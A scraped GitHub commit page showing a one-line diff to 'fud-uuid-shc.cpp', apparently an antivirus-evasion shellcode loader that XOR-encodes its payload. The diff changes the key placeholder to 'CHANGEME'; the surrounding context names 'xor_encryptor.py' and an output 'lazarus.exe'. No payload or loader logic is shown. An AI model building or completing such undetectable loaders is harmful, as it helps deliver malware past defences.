We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
CHANGEME
1 parent 9887c6e commit 80df17bCopy full SHA for 80df17b
fud-uuid-shc.cpp
@@ -8,7 +8,7 @@
8
#include <rpc.h>
9
10
// set your xor key( it should be similar to the one you used in the "xor_encryptor.py" )
11
-#define XOR_KEY "<YOUR_XOR_KEY>"
+#define XOR_KEY "CHANGEME"
12
13
#define EXE_NAME "lazarus.exe"
14
0 commit comments